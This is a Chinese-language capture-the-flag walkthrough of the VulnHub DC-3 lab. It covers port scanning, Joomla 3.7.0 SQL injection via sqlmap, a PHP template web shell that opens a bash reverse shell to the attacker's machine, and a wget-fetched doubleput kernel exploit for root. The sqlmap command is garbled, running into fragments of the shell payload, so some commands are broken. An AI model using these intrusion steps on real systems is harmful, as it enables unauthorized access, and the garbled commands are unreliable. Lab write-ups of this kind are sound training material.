VulnHub通关日记-DC_3-Walkthrough

靶机简介

大家好，我是 saulGoodman，这篇文章是DC系列第三篇Walkthrough，总共有8篇，敬请期待！下载地址：https://www.vulnhub.com/entry/dc-3,312/这次靶机只有一个 Flag，也就是在 /root 目录下的！所以我们要提升为 root 权限！

信息搜集

拿到靶机后的第一件事就是对它进行端口扫描：

nmap -A -p- -T4 192.168.1.103

这边用 NMAP 扫描出来后发现它只开放了一个 80 端口，而且使用的 CMS 是 Joomla，这个 CMS 我之前完红日靶场遇到过一次。

既然 CMS 是 Joomla 那么就使用它的扫描工具对它一顿**吧：

perl joomscan.pl -u http://192.168.1.103

扫描出来后我们得到了两个关键信息，也就是它的版本和它的网站后台地址：

版本：Joomla 3.7.0后台地址 : http://192.168.1.103/administrator/

先访问它的首页发现了一段提示信息：

Welcome to DC-3.​This time, there is only one flag, one entry point and no clues.​To get the flag, you'll obviously have to gain root privileges.​How you get to be root is up to you - and, obviously, the system.​Good luck - and I hope you enjoy this little challenge.  :-)

大概的意思就是说这个靶场只有一个Flag，要让我们取得 root 权限！

Joomla SQL 注入

既然是这样那么我首先是搜索了有关于 Joomla 3.7.0 的漏洞信息，看看能不能捡个漏

searchsploit Joomla 3.7.0

由上图可见，它这个版本有一个 SQL 注入！既然有注入那么就丢到 Sqlmap 一把梭：

sqlmap -u "http://192.168.1.103/index.php?option=com_fields?php
system("bash -c 'bash -i >
?>

这个时候 KALI 用 nc 监听 4444，我们访问 saul.php 这个文件成功得到一枚shell：

192.168.1.103/templates/beez3/saul.php

权限提升

拿到shell只后我查看了一下内核版本发现系统是16年的 Ubuntu：

uname -a

紧接着我搜索有关于这个版本的漏洞发现了一个提权漏洞：

这是它的下载地址：

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

我把 exp 下载到本地只后，我 KALI 先是用 python 开启了一个简单的服务器用于靶机下载我们的 exp：

python -m SimpleHTTPServer 8888

随后靶机用 wget 把我们的 exp 下载到靶机上：

紧接着解压文件后，运行 doubleput 提权为 root：

最后也是在 root 目录下拿到了 Flag！